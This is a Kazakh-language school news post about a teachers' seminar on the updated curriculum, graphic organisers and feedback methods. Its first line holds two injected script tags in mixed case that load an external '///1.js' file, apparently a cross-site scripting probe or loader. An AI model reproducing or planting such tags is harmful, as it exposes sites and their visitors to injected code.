<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.02.2018

Ақпанның 10 күні мектебімізде қоғамдық-гуманитарлық әдістемелік бірлестігінің онкүндігі аясында «Жаңартылған бағдарлама - білім берудің жаңа мазмұны» тақырыбында семинар өтті. Семинардың мақсаты – жаңартылған бағдарламаның ерекшелігін ашу, сабақ барысында қолданылатын кейбір әдіс-тәсілдерді көрсету.Семинардың бірінші бөлімі бойынша әдістемелік бірлестік жетекшісі Садвакасова Г.С. «Графикалық органайзерлерді сабақтарда қолдану» деген тақырыпты ашып, түсіндірді.

Графикалық органайзер – сабақтың бейне жоспары. Графикалық органайзерлерді пайдаланудың нәтижесі – тақырыптың тұтастығын, қисындылығын, ықшамдылығын, көрнекілігін қамтамасыз етеді, оқушылардың білімін тиянақтайды, алған білімін оңай еске түсіруге көмектеседі. Оқушыларға сапалы білім беру, оқу бағдарламасындағы білімді қамту мен кеңейту жүйесін жүзеге асырудың тиімді жолы–графикалық органайзерлерді пайдалану болып табылады.

Жүргізілген жұмыс белгілі бір нәтижеге бағытталады;

2. Оқушылардың сабаққа ынтасы, қызығушылығы артады;

3. Мұғалім мен оқушы шығармашылықпен жұмыс жасайды;

4. Мұғалім оқушыны жан-жақты зерттейді;

5. Оқушылардың өздігінен жан-жақты білім алуға жағдай жасалады;

6. Сабақ кезінде мұғалім уақытты ұтымды пайдалануға қол жеткізеді;

7. Қиын мәтіннен негізгісін тауып алуға, өз бетімен жұмыс жасауға, ойлануға, ой-өрісін дамытуға көмектеседі; Осы тақырып бойынша ұстаздар топпен түрлі тапсырмалар орындады.

Семминарды екінші бөлімі бойынша ағылшын пәнінің мұғалімі Самурат Нурегүл «Кері байланыстың түрлері» тақырыбын жан-жақты ашып, түсіндірді. Кері байланыс – адамның өзі куә болған оқиғаға немесе басқалардың әрекетіне айтылған пікірі. Кері байланыс әрекетін ұйымдастыруда көзделетін басты мақсат: Оқушының саналы ішкі рефлексиясын даярлау, сол арқылы қазіргі кездегі маңызды болып саналатын өз бетімен еңбектену, бәсекеге қабілетті болу, алғырлық сияқты қабілеттерін дамыту.

Семинарға қатысқан мұғалімдер өз жұмыстарына қажетті ақпарат алып, қоржындарын еселегендеріне риза болып, рахмет айтып тарқасты.

Просмотров: 559


Пікір қосу



Деректерді қолтаңбаға қосу